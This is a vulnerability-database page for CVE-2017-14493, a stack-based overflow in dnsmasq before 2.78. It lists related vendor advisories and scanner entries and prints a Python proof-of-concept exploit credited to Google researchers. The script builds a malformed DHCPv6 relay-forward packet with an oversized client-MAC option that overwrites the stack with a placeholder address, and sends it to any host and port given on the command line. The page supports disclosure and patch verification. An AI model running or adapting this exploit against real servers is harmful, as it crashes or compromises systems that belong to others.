Dnsmasq Stack based overflow(CVE-2017-14493)

🗓️ 09 Oct 2017 00:00:00Reported by RootType

Dnsmasq Stack Overflow CVE-2017-14493, PoC Executio

Reporter	Title	Published	Views	Family All 124
0day.today	Dnsmasq < 2.78 - Stack-Based Overflow Exploit	2 Oct 201700:00	–	zdt
ALT Linux	Security fix for the ALT Linux 10 package dnsmasq version 2.78-alt1	6 Oct 201700:00	–	altlinux
IBM Security Bulletins	Security Bulletin: Multiple security vulnerabilities in IBM Cloud Manager with OpenStack affect IBM Cloud Orchestrator and Cloud Orchestrator Enterprise	17 Jun 201822:33	–	ibm
IBM Security Bulletins	Security Bulletin: Multiple security vulnerabilities in dnsmasq affect IBM Cloud Manager with OpenStack	8 Aug 201804:13	–	ibm
Tenable Nessus	Amazon Linux 2 : dnsmasq (ALAS-2019-1251)	24 Jul 201900:00	–	nessus
Tenable Nessus	Amazon Linux AMI : dnsmasq (ALAS-2017-907)	3 Oct 201700:00	–	nessus
Tenable Nessus	CentOS 7 : dnsmasq (CESA-2017:2836)	3 Oct 201700:00	–	nessus
Tenable Nessus	Debian DSA-3989-1 : dnsmasq - security update	3 Oct 201700:00	–	nessus
Tenable Nessus	dnsmasq < 2.78 Multiple Remote Vulnerabilities	3 Oct 201700:00	–	nessus
Tenable Nessus	EulerOS 2.0 SP1 : dnsmasq (EulerOS-SA-2017-1239)	13 Oct 201700:00	–	nessus


                                                #!/usr/bin/python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
#  Fermin J. Serna <[email protected]>
#  Felix Wilhelm <[email protected]>
#  Gabriel Campana <[email protected]>
#  Kevin Hamacher <[email protected]>
#  Gynvael Coldwind <[email protected]>
#  Ron Bowes - Xoogler :/

from struct import pack
import sys
import socket

def send_packet(data, host, port):
    print("[+] sending {} bytes to {}:{}".format(len(data), host, port))
    s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDP)

    s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, len(data))
    if s.sendto(data, (host, port)) != len(data):
        print("[!] Could not send (full) payload")
    s.close()

def u8(x):
    return pack("B", x)

def u16(x):
    return pack("!H", x)

def gen_option(option, data, length=None):
    if length is None:
        length = len(data)

    return b"".join([
        u16(option),
        u16(length),
        data
    ])

if __name__ == '__main__':
    assert len(sys.argv) == 3, "{} <ip> <port>".format(sys.argv[0])
    pkg = b"".join([
        u8(12),                         # DHCP6RELAYFORW
        u16(0x0313), u8(0x37),          # transaction ID
        b"_" * (34 - 4),
        # Option 79 = OPTION6_CLIENT_MAC
        # Moves argument into char[DHCP_CHADDR_MAX], DHCP_CHADDR_MAX = 16
        gen_option(79, "A" * 74 + pack("<Q", 0x1337DEADBEEF)),
    ])

    host, port = sys.argv[1:]
    send_packet(pkg, host, int(port))

09 Oct 2017 00:00Current

EPSS0.04678